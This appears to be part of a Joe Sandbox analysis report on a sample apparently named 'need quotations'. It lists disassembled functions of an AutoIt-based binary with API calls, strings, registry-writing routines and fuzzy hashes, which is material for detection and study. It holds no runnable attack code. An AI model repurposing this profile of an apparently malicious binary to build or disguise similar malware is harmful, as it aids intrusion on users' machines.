Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 2a79185030393c1e09b825c39e2db6da25e5abb6c08460c12cb1742e9ba8d822
Instruction ID: 6f1245070f7562a7e449bb962b5eb660cbd119740e0343c0208d5940b8f11dd4
Opcode Fuzzy Hash: 2a79185030393c1e09b825c39e2db6da25e5abb6c08460c12cb1742e9ba8d822
Instruction Fuzzy Hash: 0951D13927A306AB8714FF15C891839F7A0FB96784F20482AF507976D1DBA0D979CB42

Function 0024CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0024CC68
__wcsnicmp.LIBCMT ref: 0024CC80
__wcsnicmp.LIBCMT ref: 0024CC98
__wcsnicmp.LIBCMT ref: 0024CCB0
__wcsnicmp.LIBCMT ref: 0024CCC8
__wcsnicmp.LIBCMT ref: 0024CCE0
__wcsnicmp.LIBCMT ref: 0024CCF8
__wcsnicmp.LIBCMT ref: 0024CD0C
__wcsnicmp.LIBCMT ref: 0024CD4D
__wcsnicmp.LIBCMT ref: 0024CD61
__wcsnicmp.LIBCMT ref: 0024CD75
__wcsnicmp.LIBCMT ref: 0024CD89

Strings

#OnAutoItStartRegister, xrefs: 0024CCAA
Bad directive syntax error, xrefs: 002B2ECB
#comments-start, xrefs: 0024CCF2, 0024CD47
#cs, xrefs: 0024CD06, 0024CD5B
#comments-end, xrefs: 0024CD6F
#requireadmin, xrefs: 0024CC92
Cannot parse #include, xrefs: 002B2FA1
#notrayicon, xrefs: 0024CC7A
#pragma compile, xrefs: 0024CC62
#include, xrefs: 0024CCDA
#include-once, xrefs: 0024CCC2
#ce, xrefs: 0024CD83
Unterminated group of comments, xrefs: 002B2FB4

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: decb04bb5d55381cf34f2d8c41823e65357f311c812bad75d6eee95931b8bb3e
Instruction ID: 0ba5e246d655cd8eb8f7729e6146e79a7d5fb130d3dd9657d788213c8a375de8
Opcode Fuzzy Hash: decb04bb5d55381cf34f2d8c41823e65357f311c812bad75d6eee95931b8bb3e
Instruction Fuzzy Hash: 49816930671306FADB68AE68CC82FBB3769EF15340F144025F905AB1C6EB70E975CA90

Function 002A638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,002DDC00), ref: 002A6449

Strings

HIDEDROPDOWN, xrefs: 002A6520
GETCURRENTCOL, xrefs: 002A6724
UNCHECK, xrefs: 002A66A1
EDITPASTE, xrefs: 002A675B
ISCHECKED, xrefs: 002A6659
GETLINE, xrefs: 002A678B
GETLINECOUNT, xrefs: 002A66E4
TABRIGHT, xrefs: 002A64BD
ISVISIBLE, xrefs: 002A6455
TABLEFT, xrefs: 002A64A7
DELSTRING, xrefs: 002A6569
SETCURRENTSELECTION, xrefs: 002A65D6
ADDSTRING, xrefs: 002A6536
CURRENTTAB, xrefs: 002A64DD
ISENABLED, xrefs: 002A648C
SHOWDROPDOWN, xrefs: 002A6500
SELECTSTRING, xrefs: 002A6626
SENDCOMMANDID, xrefs: 002A67CA
GETCURRENTLINE, xrefs: 002A6704
GETSELECTED, xrefs: 002A66C1
GETCURRENTSELECTION, xrefs: 002A6603
CHECK, xrefs: 002A668B
FINDSTRING, xrefs: 002A6596

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 136f633582ab319143f1742aebcf73543a42d3deac950b79f6cb2f7696d934a5
Instruction ID: 51af5144d2bd3adec7f417f5552b8a795b843e5315fe52490f0df7a3354c9cb8
Opcode Fuzzy Hash: 136f633582ab319143f1742aebcf73543a42d3deac950b79f6cb2f7696d934a5
Instruction Fuzzy Hash: E1C1B5302342068FCB08FF10C555A6EB7A5AF96745F094869F8865B2E2DF70ED6ACF41

Function 002AD575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 002AD5AE
SetTextColor.GDI32(?,?), ref: 002AD5B2
GetSysColorBrush.USER32(0000000F), ref: 002AD5C8
GetSysColor.USER32(0000000F), ref: 002AD5D3
CreateSolidBrush.GDI32(?), ref: 002AD5D8
GetSysColor.USER32(00000011), ref: 002AD5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 002AD5FE
SelectObject.GDI32(?,00000000), ref: 002AD60F
SetBkColor.GDI32(?,00000000), ref: 002AD618
SelectObject.GDI32(?,?), ref: 002AD625
InflateRect.USER32(?,000000FF,000000FF), ref: 002AD644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002AD65B
GetWindowLongW.USER32(00000000,000000F0), ref: 002AD670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002AD698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002AD6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 002AD6DD
DrawFocusRect.USER32(?,?), ref: 002AD6E8
GetSysColor.USER32(00000011), ref: 002AD6F6
SetTextColor.GDI32(?,00000000), ref: 002AD6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002AD712
SelectObject.GDI32(?,002AD2A5), ref: 002AD729
DeleteObject.GDI32(?), ref: 002AD734
SelectObject.GDI32(?,?), ref: 002AD73A
DeleteObject.GDI32(?), ref: 002AD73F
SetTextColor.GDI32(?,?), ref: 002AD745
SetBkColor.GDI32(?,?), ref: 002AD74F

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 1d729ebb1b11a87faca10721c849b6c7f1d2e74b72ab7d468fbb1d04cb8b8b3f
Instruction ID: 8ce147b5e3e9831e285da5216bef7494d478f32b455cd9526d4c5c0308e683ba
Opcode Fuzzy Hash: 1d729ebb1b11a87faca10721c849b6c7f1d2e74b72ab7d468fbb1d04cb8b8b3f
Instruction Fuzzy Hash: A8515F71900208BFDF109FA4EC48EAEBB79FF09320F144525F916AB2A1D7719A40CF90

Function 002AB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002AB7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002AB7C1
CharNextW.USER32(0000014E), ref: 002AB7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002AB831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002AB847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002AB858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002AB875
SetWindowTextW.USER32(?,0000014E), ref: 002AB8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002AB8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 002AB90E
_memset.LIBCMT ref: 002AB933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002AB97C
_memset.LIBCMT ref: 002AB9DB
SendMessageW.USER32 ref: 002ABA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 002ABA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 002ABB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 002ABB2C
GetMenuItemInfoW.USER32(?), ref: 002ABB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002ABBA3
DrawMenuBar.USER32(?), ref: 002ABBB2
SetWindowTextW.USER32(?,0000014E), ref: 002ABBDA

Strings

0, xrefs: 002ABB4F

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 46b6ade8db4bdb1cf93d62c483a139e722863ee8308ea45da59cb3687961042f
Instruction ID: 6ae23fdbc1c9b85a47d899a9de03cb51d4dfb989a5c4f03cadaa2f6ee45dd78d
Opcode Fuzzy Hash: 46b6ade8db4bdb1cf93d62c483a139e722863ee8308ea45da59cb3687961042f
Instruction Fuzzy Hash: 62E1C471910209AFDF12CF65DC88EEE7B78FF06714F108156F919AA192DB7089A1DF60

Function 00242EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00242F7A
IsWindow.USER32(?), ref: 002B22FD

Strings

P+/, xrefs: 002B21E0
H+/, xrefs: 002B2184
HANDLE, xrefs: 002B20E2
ALL, xrefs: 002B2264
ACTIVE, xrefs: 002B20CC
TITLE, xrefs: 002B2292
REGEXPTITLE, xrefs: 002B20F8
LAST, xrefs: 002B20B6
REGEXPCLASS, xrefs: 002B2149
CLASS, xrefs: 002B2128
INSTANCE, xrefs: 002B223C
T+/, xrefs: 002B220E
L+/, xrefs: 002B21B2

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$H+/$HANDLE$INSTANCE$L+/$LAST$P+/$REGEXPCLASS$REGEXPTITLE$T+/$TITLE
API String ID: 62970417-1882423035
Opcode ID: 40c0c32271e17ec06a16cf7d14cbdfc8b2b191a836de90e3977ca33cefb96e5a
Instruction ID: 8d9af2609d2a17aeb4adb63f800f36980e3e872a29574293467b8b09b05eadc7
Opcode Fuzzy Hash: 40c0c32271e17ec06a16cf7d14cbdfc8b2b191a836de90e3977ca33cefb96e5a
Instruction Fuzzy Hash: F9D1A430124746DBCB08EF10C481AEABBB4BF54384F50496AF856975A1DB70E9BECF91

Function 002A764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 002A778A
GetDesktopWindow.USER32 ref: 002A779F
GetWindowRect.USER32(00000000), ref: 002A77A6
GetWindowLongW.USER32(?,000000F0), ref: 002A7808
DestroyWindow.USER32(?), ref: 002A7834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002A785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002A787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002A78A1
SendMessageW.USER32(?,00000421,?,?), ref: 002A78B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002A78C9
IsWindowVisible.USER32(?), ref: 002A78E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002A7904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002A7918
GetWindowRect.USER32(?,?), ref: 002A7930
MonitorFromPoint.USER32(?,?,00000002), ref: 002A7956
GetMonitorInfoW.USER32 ref: 002A7970
CopyRect.USER32(?,?), ref: 002A7987
SendMessageW.USER32(?,00000412,00000000), ref: 002A79F2

Strings

0, xrefs: 002A7735
(, xrefs: 002A7965
tooltips_class32, xrefs: 002A7856

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 8edeaac13c7be7774c9c521d4811b317e67f1bc3b0511a1b4e9261a326673436
Instruction ID: 0df7d717542e97d167b99e44c96ec452ca4220fc8e922cc032669e2969894e9d
Opcode Fuzzy Hash: 8edeaac13c7be7774c9c521d4811b317e67f1bc3b0511a1b4e9261a326673436
Instruction Fuzzy Hash: 0BB18B71628301AFDB04DF64DD48B6ABBE4FF89710F00891DF5999B292DB70E814CB96

Function 0025A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0025A939
GetSystemMetrics.USER32(00000007), ref: 0025A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0025A96C
GetSystemMetrics.USER32(00000008), ref: 0025A974
GetSystemMetrics.USER32(00000004), ref: 0025A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0025A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0025A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0025A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0025AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0025AA2B
GetStockObject.GDI32(00000011), ref: 0025AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0025AA52

Part of subcall function 0025B63C: GetCursorPos.USER32(000000FF), ref: 0025B64F
Part of subcall function 0025B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0025B66C
Part of subcall function 0025B63C: GetAsyncKeyState.USER32(00000001), ref: 0025B691
Part of subcall function 0025B63C: GetAsyncKeyState.USER32(00000002), ref: 0025B69F

SetTimer.USER32(00000000,00000000,00000028,0025AB87), ref: 0025AA79

Strings

AutoIt v3 GUI, xrefs: 0025A9F1

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: cceb127d4533977d0e7e6c48adb2972871f161adb64867d69a3a87952000222e
Instruction ID: 3fc293f5d825aadd0708d3350378ec02f18115bdea016245346d42b01069e399
Opcode Fuzzy Hash: cceb127d4533977d0e7e6c48adb2972871f161adb64867d69a3a87952000222e
Instruction Fuzzy Hash: 66B18C71A1020A9FDB14DFA8DC4ABEE7BB8FB08315F114229FE15A7290DB70E850CB55

Function 002A3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002A3735
RegCreateKeyExW.ADVAPI32(?,?,00000000,002DDC00,00000000,?,00000000,?,?), ref: 002A37A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002A37EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002A3874
RegCloseKey.ADVAPI32(?), ref: 002A3B94
RegCloseKey.ADVAPI32(00000000), ref: 002A3BA1

Strings

REG_SZ, xrefs: 002A38B2
REG_DWORD, xrefs: 002A3A65
REG_BINARY, xrefs: 002A3B2F
REG_EXPAND_SZ, xrefs: 002A3811
REG_QWORD, xrefs: 002A3AE2
REG_MULTI_SZ, xrefs: 002A395C

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 378d4e76c349979008ef9f631378b5b500244963484fbddefdef508221467f5d
Instruction ID: 367e6fb30a254cb9e1707a25fa86f9d036044695c231bb3574ee32786f2e8c37
Opcode Fuzzy Hash: 378d4e76c349979008ef9f631378b5b500244963484fbddefdef508221467f5d
Instruction Fuzzy Hash: 5D025B756206019FCB14EF14C855A2AB7E5FF89720F04845DF98A9B3A1CB30ED65CF85

Function 002A6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002A6C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002A6D16

Strings

GETSELECTEDCOUNT, xrefs: 002A6CF9
SELECT, xrefs: 002A6DA8
GETSUBITEMCOUNT, xrefs: 002A6CA1
GETITEMCOUNT, xrefs: 002A6C84
ISSELECTED, xrefs: 002A6D21
GETTEXT, xrefs: 002A6CBF
DESELECT, xrefs: 002A6DFC
SELECTINVERT, xrefs: 002A6DDE
SELECTCLEAR, xrefs: 002A6D8D
VIEWCHANGE, xrefs: 002A6ECD
SELECTALL, xrefs: 002A6D75
FINDITEM, xrefs: 002A6E81
GETSELECTED, xrefs: 002A6E3C

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: fd625a33b5223b97a5cadfbe8668583bd850c198ea4156f2615ddc8b8b7ea760
Instruction ID: 3cef43b0be9fceb6581dfce3b67683f66cbf8b438f895122f93a4d22c9695415
Opcode Fuzzy Hash: fd625a33b5223b97a5cadfbe8668583bd850c198ea4156f2615ddc8b8b7ea760
Instruction Fuzzy Hash: 7CA1BE302303429FCB18EF20C955A6AB3A1BF45751F188969B9969B3D2DF70ED29CF41

Function 0027CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0027CF91
__swprintf.LIBCMT ref: 0027D032
_wcscmp.LIBCMT ref: 0027D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0027D09A
_wcscmp.LIBCMT ref: 0027D0D6
GetClassNameW.USER32(?,?,00000400), ref: 0027D10D
GetDlgCtrlID.USER32(?), ref: 0027D15F
GetWindowRect.USER32(?,?), ref: 0027D195
GetParent.USER32(?), ref: 0027D1B3
ScreenToClient.USER32(00000000), ref: 0027D1BA
GetClassNameW.USER32(?,?,00000100), ref: 0027D234
_wcscmp.LIBCMT ref: 0027D248
GetWindowTextW.USER32(?,?,00000400), ref: 0027D26E
_wcscmp.LIBCMT ref: 0027D282

Strings

%s%u, xrefs: 0027D02C

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 64c10d5e948dfb0eda6cf640f46da11fb934fc14472a82f844130bb72e24db5b
Instruction ID: a1117bcf089fa3d22a50f1b940fff85ab2157823f06ba0fc733580983f7e7591
Opcode Fuzzy Hash: 64c10d5e948dfb0eda6cf640f46da11fb934fc14472a82f844130bb72e24db5b
Instruction Fuzzy Hash: FDA1C031224307AFD715DF64C884FAAB7A8FF44354F10852AFD9D92192EB30E966CB91

Function 0027D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0027D8EB
_wcscmp.LIBCMT ref: 0027D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0027D924
CharUpperBuffW.USER32(?,00000000), ref: 0027D941
_wcscmp.LIBCMT ref: 0027D95F
_wcsstr.LIBCMT ref: 0027D970
GetClassNameW.USER32(00000018,?,00000400), ref: 0027D9A8
_wcscmp.LIBCMT ref: 0027D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0027D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 0027DA28
_wcscmp.LIBCMT ref: 0027DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 0027DA60
GetWindowRect.USER32(00000004,?), ref: 0027DAC9

Strings

@, xrefs: 0027D8C6
ThumbnailClass, xrefs: 0027D9B3, 0027DA33

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 7cd679b5d3d6db8750d837d3239dd658730c1181a15a9d7cf4afac6286de92e8
Instruction ID: 7ab8aab769f6f4e8f0f3c83036e9f2bb13f9379c63f44d8fa29dc76be013851b
Opcode Fuzzy Hash: 7cd679b5d3d6db8750d837d3239dd658730c1181a15a9d7cf4afac6286de92e8
Instruction Fuzzy Hash: EE81A4310183069BDB05DF14D885F6A7BE8FF84318F14846AFD8D9A096DB30ED65CBA1

Function 0027D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0027D753

Strings

[CLASS:, xrefs: 0027D7A3
HANDLE=, xrefs: 0027D74C
[ACTIVE, xrefs: 0027D740
[REGEXPTITLE:, xrefs: 0027D77B
[LAST, xrefs: 0027D800
[ALL, xrefs: 0027D7F9
ALL, xrefs: 0027D7E7
ACTIVE, xrefs: 0027D72E
[HANDLE:, xrefs: 0027D75F
